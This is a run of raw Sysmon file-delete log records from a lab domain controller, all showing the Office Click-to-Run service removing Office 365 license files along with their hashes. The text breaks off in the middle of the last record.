23542300x800000000000000067349Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365SmallBusPremR_SubTrial3-pl.xrm-msMD5=1F4E0C755FC6254A55B8C41F422EE1EB,SHA256=BDE6585A9B797F4F15D95877C4EFEF635CC34E8D1B8FF9C8CFB8AD2EA06862AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067348Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365SmallBusPremR_SubTrial2-ul-oob.xrm-msMD5=BA140773D4430E6A2A4011FF817312B0,SHA256=89AD2107DDA39684321A2F94F61A82831669F6F8E170BB37A319783E92DFFA7E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067347Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365SmallBusPremR_SubTrial2-ppd.xrm-msMD5=1596BA61B6904477C1542AC2C45DBB15,SHA256=7974999F600FBD533B3566A2D8E02C37EF5F006D9A5B64A78BF0E00BE6AB1BBB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067346Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365SmallBusPremR_SubTrial2-pl.xrm-msMD5=55AED02A25CC95E8E44892159339D6DF,SHA256=9956E4A4378D90D7B3CD07C8A6590827B2BAE1132AB975D456651FBF0AED32C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067345Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365SmallBusPremR_SubTrial1-ul-oob.xrm-msMD5=FF28199D9C5B00F1E289ACC794FF9699,SHA256=9192C85F658D224639EB9A3710ADA85D0FB4031A7838A9C82A4D2D9A00A418EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067344Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.127{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365SmallBusPremR_SubTrial1-ppd.xrm-msMD5=68D39E709F5D9EA87886CD240E022075,SHA256=EB50A3F40F289DD84CF005F760FE094FA0EFCA2EA10E9E3211D01451DF579854,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067343Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.127{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365SmallBusPremR_SubTrial1-pl.xrm-msMD5=E47BC3BCC12E493B9FEE2F7BF7327137,SHA256=91CA34D677446CCE3E5602D1CEA92462A73C1841CD43DA8946A951EC82C8F8C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067342Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.127{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365SmallBusPremR_Subscription5-ul-oob.xrm-msMD5=DDEAB70B4E1479D242EBD2BE0676E197,SHA256=74FEE5517DD285CB4E2E8D71E353284C0C51B8289673B868BEBF0FCFA381D567,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067341Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.127{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365SmallBusPremR_Subscription5-ppd.xrm-msMD5=AC3E82E6BFA96DD2F6F1DE170411DF02,SHA256=51113669E99C29A9CDA2C771C2F7701839D0EC36D1BD9A6B4EBC6D2F5FA4E57D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067340Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.127{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365SmallBusPremR_Subscription5-pl.xrm-msMD5=2BAC492E2DF37B6D2013C67398A3A018,SHA256=1EDA8D3981AD7642C7BF425ED15C9FC78F8F00B0990258E52FE108D250F50178,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067339Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.127{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365SmallBusPremR_Subscription4-ul-oob.xrm-msMD5=116D16ED1651A9495518807BBC0821B7,SHA256=2D2DA0F59BB4D97F718374CD28045CC6A656B30E8E5E01C4AA7E786C6EED0D4C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067338Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.127{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365SmallBusPremR_Subscription4-ppd.xrm-msMD5=F00D2D54D0C2CE7B08D6C111CFA7764B,SHA256=5FBD4243F33D78D211831063B1D6DA8A9F12A0A873F6167EC473CD3AED6C7840,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067337Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.127{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365SmallBusPremR_Subscription4-pl.xrm-msMD5=79FBB266BAEC4C2263F3ED83F23F8789,SHA256=9D385E910037BFDAFDEAF4AED893233E56A697A22A4BCF7381B0750E309E4EAF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067336Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.127{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365SmallBusPremR_Subscription3-ul-oob.xrm-msMD5=4775BAE02F0627A44D0E239292B0F217,SHA256=14BC8CEFFC38351E7003EC561BF3C46210467EEFC12E279FDAE6CCD52A712E9E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067335Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.127{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365SmallBusPremR_Subscription3-ppd.xrm-msMD5=345636A7444E2B7A5F7E3B7B4D71734F,SHA256=F8B539ECA1325DEDA5A2D67C7656F47D5F40C42E0C577F519E388BCE02286F69,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067334Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.127{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365SmallBusPremR_Subscription3-pl.xrm-msMD5=D40D71D99745BF1E9AC74FD43204AC59,SHA256=6199CBBD22D053482FC60AB896A9586E2A91F973E4C3996E15723F66C6916896,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067333Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.127{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365SmallBusPremR_Subscription2-ul-oob.xrm-msMD5=92895B63C6642E372D036EB22AF5D9C9,SHA256=462423ADB2D4644935DA58A67D94D1419542092B39617BBE2CA3B650EE219B70,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067332Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.127{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365SmallBusPremR_Subscription2-ppd.xrm-msMD5=843BB2B74F8514F67FE85C1E6018B683,SHA256=412781313A5094C2155B587586FB23D6365BCB37ADE38B6824C92E012201DA6C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067331Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.127{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365SmallBusPremR_Subscription2-pl.xrm-msMD5=96634658ACFD4B03A2028477FB0F39DC,SHA256=9306AE5099722AFE84515BDC496F32866F4394F77E9C6F74F407ABE755417A44,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067330Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365SmallBusPremR_Subscription1-ul-oob.xrm-msMD5=81A7C810675B67A8BB2F284C21F04589,SHA256=DA83884B0400D789C80441ECC92AD367EF84ABCE323CB98530670C908533DDAC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067329Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365SmallBusPremR_Subscription1-ppd.xrm-msMD5=0B18D6CD3FDE68735F733A73B1F5F24A,SHA256=506E7CA791CF5512E7F287074AFE5DB2B4F6123412AFA659228B2BAA2D59EB67,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067328Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365SmallBusPremR_Subscription1-pl.xrm-msMD5=161BD066144A08CE0D8CBEC9B95F312D,SHA256=6AD04F22A2972F99EAF483CDA050951F647D76D04BC83B88D16964B92A2F1A72,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067327Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365SmallBusPremR_Grace-ul-oob.xrm-msMD5=3DBF2EC0456F993A1021C99CA1F27AEA,SHA256=53BF26CBA88EC3BED99F5D96282C81423762A30FCF09F7F0492768C4E1C4A0F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067326Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365SmallBusPremR_Grace-ppd.xrm-msMD5=E4846E7D825754275268D8A1FE1814C9,SHA256=BDCFCFEC4138AD434253F239D05518B9D68A2C9C092964026BC59F73E7982F8D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067325Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365SmallBusPremDemoR_BypassTrial365-ul-oob.xrm-msMD5=94F7C7FCB8F2219091269EC9E5BE15A2,SHA256=BDB35FADF4BD70257DD84E7C04F3485C81EB26B7E8F1BCBBAB911567E4791C9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067324Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365SmallBusPremDemoR_BypassTrial365-ppd.xrm-msMD5=13EF65F9882AE7BEACF63C3D714905AB,SHA256=91103470A0C33010FAF806A6F43BCE73330C169040D29458EB61C73681CD2705,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067323Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365ProPlusR_SubTrial5-ul-oob.xrm-msMD5=81158ABB9EFA7396EB1EC6CF637C2C15,SHA256=20E97124D8557AAFA222B56F11042ADCFBC23F3E19B18D39DEF172DCA04B9A60,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067322Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365ProPlusR_SubTrial5-ppd.xrm-msMD5=756510B259C8D1A6988B029564C4D97D,SHA256=A87906023480B374ADDF0F7AE43BEDDFC8FEA377FE15797A0841766E1F6D82B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067321Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365ProPlusR_SubTrial5-pl.xrm-msMD5=DD9E24BD23545BBCE337C03AA2756FFF,SHA256=7702ABE2BF52982F8CD3176FD1533BC5E7C939CA8B234A8352E6C6C4D43B8C33,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067320Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365ProPlusR_SubTrial4-ul-oob.xrm-msMD5=7AAFA16A5A9BCBA050F5C52DACE3709D,SHA256=F0368F91A6D3E29514129A618944F639CD5C1752B2AF98C83A1A604A325199D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067319Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365ProPlusR_SubTrial4-ppd.xrm-msMD5=B7DFFF2165FCFB43D7F336F2AF92DB95,SHA256=DFDDA8D13EFB4D15A8A275EC88D31BEEAC1B0EEF1AA4A26290D5B5FBE4B520B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067318Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365ProPlusR_SubTrial4-pl.xrm-msMD5=AF63950E21DEC8BF44D2D036CE0D0585,SHA256=FC1F500AB1EC2C4D5B0DC2FD52076513371965C053D69EAF51BAE19370721141,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067317Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365ProPlusR_SubTrial3-ul-oob.xrm-msMD5=2CC2093028E14A71FC5A3202D1BDB3CF,SHA256=4797D46414C6A88189FFA0ABD4C03D389D88E468E7508A81CC4C81FB530A52AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067316Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365ProPlusR_SubTrial3-ppd.xrm-msMD5=2BD1D950D933F96FE87F78EBBC7A5CC7,SHA256=81033679CCE237BE5C33C046231D70AD4AEECE28658A66951FABC836DEFB97BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067315Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365ProPlusR_SubTrial3-pl.xrm-msMD5=FB9E5599AB12E6B0B9CAC52F312B8388,SHA256=C59D537616F5A63376B4247AE63F8B34AE78E4ABFDD1C2E3450870685C060DE4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067314Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365ProPlusR_SubTrial2-ul-oob.xrm-msMD5=6375D6D46B43D02EC4DACEE7A0D71974,SHA256=D54405D11F559E221CBF750072A641C823B5CD34B07CBDF8C819308F0FA8E123,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067313Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365ProPlusR_SubTrial2-ppd.xrm-msMD5=6F2F47DD20FBBA6FBC2FB1F3183AF7A3,SHA256=63B236A13B778B8EFEA9B372A83D1FB32A9F177785C2970E6793FB7A0F057BDC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067312Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365ProPlusR_SubTrial2-pl.xrm-msMD5=7EEDDB118C88C6CB098C8A3850E65348,SHA256=9751217F65490B93C55374D20403B12FEF04804DDF869D2289249DCDA05C11E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067311Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365ProPlusR_SubTrial1-ul-oob.xrm-msMD5=B661AD3365FA47759E87ABF38B2CB3B9,SHA256=3850A4D5B98BAF46A83B4C1877C58F6F737E4B818EC5CBE7F70104E694779893,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067310Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365ProPlusR_SubTrial1-ppd.xrm-msMD5=0808253DA948A60849AE6CA8D4811E69,SHA256=A9B27D3306C75573A14EE800DE278D69339F33B1F23B5E831594292259557A3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067309Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365ProPlusR_SubTrial1-pl.xrm-msMD5=58301DA5F8B87CA4726FC53F35218A6B,SHA256=0D877B588A86111A3C9B78FDAAF9D3E5C706494530399C36044BF7EF40646EC1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067308Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365ProPlusR_Subscription5-ul-oob.xrm-msMD5=53CD67334722D07B60CD37F1D41CA24B,SHA256=AC5B41BB157F0C8C7AEC9DE94A5ED1CA7914F1BAFA05DE568E826CCBD96306F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067307Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365ProPlusR_Subscription5-ppd.xrm-msMD5=1AAFB83C451EB785ACF3E906B9BFC242,SHA256=41C3C8B08E5C49E25F3C37682E02D8B6A33203CA744BD8C5776E1BEF51480DC0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067306Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 